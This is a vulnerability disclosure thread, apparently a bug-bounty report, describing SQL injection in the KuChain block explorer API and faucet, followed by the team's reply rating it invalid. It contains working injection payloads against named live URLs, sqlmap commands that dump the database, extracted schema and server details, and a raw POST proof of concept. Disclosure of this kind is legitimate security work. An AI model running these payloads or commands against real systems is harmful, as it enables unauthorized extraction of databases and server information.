Block Explorer Application - SQL Injection

[Teicu]

Block Explorer Web Application - SQL Injection Vulnerability

User submitted values were dynamically included in SQL statements without thorough sanitisation of special characters. SQL queries created in this way are often vulnerable to SQL Injection attacks. An attacker can leverage this issue to directly affect the SQL query syntax, potentially leading to the disclosure of database information, or even a compromise of the hosting server itself.

Vulnerable URL - https://explorer.kuchain.network

Vulnerable page and parameter

• /testNet/db/v1/plugin/coin_list?_t=1594723888078&limit=10&page=1&symbol=SQLINJECTION
• /testNet/db/v1/plugin/tx_list?_t=1594723901489&block_height=&limit=10&msg_coin_creator=&msg_coin_symbol=&msg_receiver=&msg_sender=SQLINJECTION

Steps to reproduce the behavior:

Open one of the following URLs in a web browser and notice the database error

https://explorer.kuchain.network/testNet/db/v1/plugin/tx_list?_t=1594723901489&block_height=&limit=10&msg_coin_creator=&msg_coin_symbol=&msg_receiver=&msg_sender=%27%7c%7ccast((select%20chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%20as%20numeric)%7c%7c%27&msg_type=&page=1&transfer_condition=and&tx_status=all

https://explorer.kuchain.network/testNet/db/v1/plugin/coin_list?_t=1594723888078&limit=10&page=1&symbol=%27%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C

Now run the following sqlmap command to extract the full database

./sqlmap.py -u "https://explorer.kuchain.network/testNet/db/v1/plugin/coin_list?_t=1594723888078&limit=10&page=1&symbol=1" --dbms=PostgreSQL --banner --random-agent -p symbol --dump

_[14:10:03] [INFO] the back-end DBMS is PostgreSQL
[14:10:03] [INFO] fetching banner
[14:10:04] [INFO] retrieved: 'PostgreSQL 12.3 (Debian 12.3-1.pgdg100+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 8.3.0-6) 8.3...
web application technology: Nginx
back-end DBMS operating system: Linux Debian
back-end DBMS: PostgreSQL
banner: 'PostgreSQL 12.3 (Debian 12.3-1.pgdg100+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 8.3.0-6) 8.3.0, 64-bit'
[14:10:09] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[14:10:09] [INFO] fetching current database
[14:10:10] [INFO] retrieved: 'public'
[14:10:10] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[14:10:10] [INFO] fetching tables for database: 'public'
[14:10:12] [INFO] retrieved: 'events'
[14:10:12] [INFO] retrieved: 'messages'
[14:10:13] [INFO] retrieved: 'transfer'
[14:10:14] [INFO] retrieved: 'block'
[14:10:15] [INFO] retrieved: 'err_table'
[14:10:16] [INFO] retrieved: 'account'
[14:10:17] [INFO] retrieved: 'acccoins'
[14:10:17] [INFO] retrieved: 'blockinfo'
[14:10:18] [INFO] retrieved: 'coins'
[14:10:19] [INFO] retrieved: 'delegation'
[14:10:20] [INFO] retrieved: 'delegation_change'
[14:10:21] [INFO] retrieved: 'lockacccoins'
[14:10:22] [INFO] retrieved: 'txmsgs'
[14:10:22] [INFO] retrieved: 'validator'
[14:10:23] [INFO] retrieved: 'tx'
[14:10:24] [INFO] retrieved: 'sync_stat'
[14:10:24] [INFO] fetching columns for table 'txmsgs' in database 'public'
[14:10:26] [INFO] retrieved: '_from'
[14:10:27] [INFO] retrieved: 'text'
[14:10:27] [INFO] retrieved: 'to'
[14:10:28] [INFO] retrieved: 'text'
[14:10:29] [INFO] retrieved: 'action'
[14:10:30] [INFO] retrieved: 'text'
[14:10:31] [INFO] retrieved: 'amount'

etc

Contact Information

m.avram.g@gmail.com

Note that this flaw should be fixed asap. Also, I think you better restrict public access to the API Swagger https://explorer.kuchain.network/testNet/

Kind Regards

EDIT 1:

Seems that the main site have the same issue

KuChain Betanet Faucet - Blind SQL Injection Vulnerability

Vulnerable URL: https://kuchain.network/faucet
Vulnerable Parameter: receiver
Method: POST

POC:

POST /portal-web/api/applyForTestFunds?lang=en_US HTTP/1.1
Host: kuchain.network
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://kuchain.network/faucet
Content-Type: multipart/form-data; boundary=---------------------------91872151416297495583940013683
Origin: https://kuchain.network
Content-Length: 217
Connection: close

-----------------------------91872151416297495583940013683
Content-Disposition: form-data; name="receiver"

SQLINJECTION
-----------------------------91872151416297495583940013683--

Using again sqlmap command line tool to extract sensitive information.

./sqlmap.py -u 'https://kuchain.network:443/portal-web/api/applyForTestFunds?lang=en_US' --data='receiver=test' --dbs --banner --random-agent --risk=3 --level=3 -p receiver

user : kuchain@172.31.186.12
database: jsapi
version: MySQL 8.0.18
database file location: /home/mysql/data/db

Regards

[Pisces-Anjou]

Hi,

Thanks for your submission. We have tested the issue you mentioned and did notice it.

Kindly note that all the data of KuChain is public data. An attacker can get all the public data by SQL Injection attacks, but it will not cause any practical impact on the chain. we admit this is a small oversight. Thanks for your reminder.

As what I have said above, there won't be any practical impact delivered by the issue you mentioned, it will not affect the normal operation of the chain, and it is not in the scope from P1 to P4. After evaluation, we consider it is not a valid vulnerability but it does a good improve suggestion.

Thanks for your attention and contribution! Please keep trying and help us improve our chain.

Regards
KuChain Team